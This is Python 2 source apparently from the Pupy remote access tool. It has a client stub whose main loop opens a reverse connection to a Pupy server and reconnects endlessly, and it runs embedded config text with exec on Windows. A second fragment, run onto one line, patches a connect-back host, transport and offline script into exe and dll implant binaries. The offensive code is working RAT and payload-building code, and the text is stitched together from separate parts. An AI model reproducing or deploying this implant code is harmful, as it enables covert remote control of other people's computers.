def main():
    """Entry point of the Pupy client stub (Python 2 code: print/exec statements, dict.iterkeys).

    Resolves the server address and transport (from the command line when
    any argument is given, otherwise from the module-level HOST/TRANSPORT
    values), loads the embedded configuration on Windows, then runs an
    endless connect / serve / retry loop against the Pupy server.

    Side effects: rebinds the module globals HOST and TRANSPORT, and on
    Windows executes the embedded config text in this module's namespace.
    Returns only when SystemExit or EOFError is raised inside the loop.
    """
    global HOST, TRANSPORT
    # Any command-line argument switches to argparse mode; with no arguments
    # the baked-in HOST/TRANSPORT module values are used unchanged.
    if len(sys.argv)>1:
        parser = argparse.ArgumentParser(prog='pp.py', formatter_class=argparse.RawTextHelpFormatter, description="Starts a reverse connection to a Pupy server\nLast sources: https://github.com/n1nj4sec/pupy\nAuthor: @n1nj4sec ([email protected])\n")
        # Only transports registered in the module-level `transports` dict are accepted.
        parser.add_argument('--transport', choices=[x for x in transports.iterkeys()], default=TRANSPORT, help="the transport to use ! (the server needs to be configured with the same transport) ")
        parser.add_argument('host', metavar='host:port', help='The address of the pupy server to connect to')
        args=parser.parse_args()
        HOST=args.host
        TRANSPORT=args.transport
    if "windows" in platform.system().lower():
        try:
            import pupy
            config_file=pupy.get_pupy_config()
            # Python 2 exec statement: the embedded config text is run as Python
            # in this module's globals. Per the config patcher lower in the file it
            # carries HOST/TRANSPORT and an optional offline script; nothing here
            # validates that text before executing it.
            exec config_file in globals()
            pupy.get_connect_back_host=(lambda: HOST)
        except ImportError:
            print "Warning : ImportError: pupy builtin module not found ! please start pupy from either it's exe stub or it's reflective DLL"
    else:
        # add_pseudo_pupy_module is defined elsewhere in the file; the name suggests
        # it installs a stand-in for the builtin `pupy` module — confirm there.
        add_pseudo_pupy_module(HOST)
    attempt=0
    # Reconnect loop: only SystemExit and EOFError terminate it; every other
    # exception (including KeyboardInterrupt) leads to a delay and a retry.
    while True:
        try:
            rhost,rport=None,None
            # Split on the last ':' only; a missing port falls back to 443.
            # NOTE(review): an IPv6 literal given without a port is mis-split here.
            tab=HOST.rsplit(":",1)
            rhost=tab[0]
            if len(tab)==2:
                rport=int(tab[1])
            else:
                rport=443
            print "connecting to %s:%s using transport %s ..."%(rhost,rport, TRANSPORT)
            # A transport entry supplies the client class and its kwargs, the stream
            # wrapper, and the stream-level transport plus its kwargs.
            t=transports[TRANSPORT]
            client=t['client'](**t['client_kwargs'])
            s=client.connect(rhost, rport)
            stream = t['stream'](s, t['client_transport'], t['client_transport_kwargs'])
            conn=rpyc.utils.factory.connect_stream(stream, ReverseSlaveService, {})
            while True:
                # Reaching this point means the connection succeeded, so the
                # retry counter is reset before each serve() call.
                attempt=0
                conn.serve()
        except KeyboardInterrupt:
            # Not fatal: falls through to the sleep below and reconnects.
            print "keyboard interrupt raised, restarting the connection"
        except SystemExit:
            print "SystemExit raised"
            break
        except EOFError:
            print "EOF received. exiting."
            break
        except Exception as e:
            # Broad catch: connection errors, a non-numeric port in HOST, and RPC
            # failures are all reduced to a printed message followed by a retry.
            print e
        # get_next_wait is defined elsewhere; presumably maps the attempt count to
        # a delay in seconds (a backoff schedule) — confirm against its definition.
        time.sleep(get_next_wait(attempt))
        attempt+=1
raise Exception("Error: multiple offsets to edit the config have been found") new_conf="HOST=\"%s:%s\"\nTRANSPORT=%s\n%s\n\x00\x00\x00\x00\x00\x00\x00\x00"%(host, port, repr(transport), offline_script) if len(new_conf)>4092: raise Exception("Error: config or offline script too long") binary=binary[0:offsets[0]]+new_conf+binary[offsets[0]+len(new_conf):] return binary if __name__=="__main__": parser = argparse.ArgumentParser(description='Process some integers.') parser.add_argument('-t', '--type', default='exe_x86', choices=['exe_x86','exe_x64','dll_x86','dll_x64'], help="(default: exe_x86)") parser.add_argument('-o', '--output', help="output path") parser.add_argument('-s', '--offline-script', help="offline python script to execute before starting the connection") parser.add_argument('-p', '--port', type=int, default=443, help="connect back ip (default:443)") parser.add_argument('--transport', choices=[x for x in transports.iterkeys()], default='tcp_ssl', help="the transport to use ! (the server needs to be configured with the same transport) ") parser.add_argument('host', nargs='*', help="connect back host") args=parser.parse_args() myhost=None if not args.host: myip=get_local_ip() if not myip: sys.exit("[-] couldn't find your local IP. You must precise an ip or a fqdn manually") myhost=myip else: myhost=args.host[0] if re.match("^.*:[0-9]+$", myhost):#auto fixing errors when entering host:port myhost, p=myhost.rsplit(':',1) if args.port==443: args.port=p script_code=""